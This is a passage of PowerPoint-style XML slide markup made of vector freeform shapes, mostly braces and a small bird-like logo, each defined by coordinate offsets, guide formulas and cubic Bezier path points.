                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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3" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="3663"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42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4" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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6" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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8" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="3657"/>
                <a:ext cx="82"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Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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0" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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2" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="3657"/>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3" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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4" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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7" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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8" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2" y="26"/>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Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="3663"/>
                <a:ext cx="78"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2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Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="3650"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79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8 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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1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5"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="71" y="199"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="196"/>
                      <a:pt x="4" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="8" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="159" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="158" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="157"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="84" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>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4"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="157"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
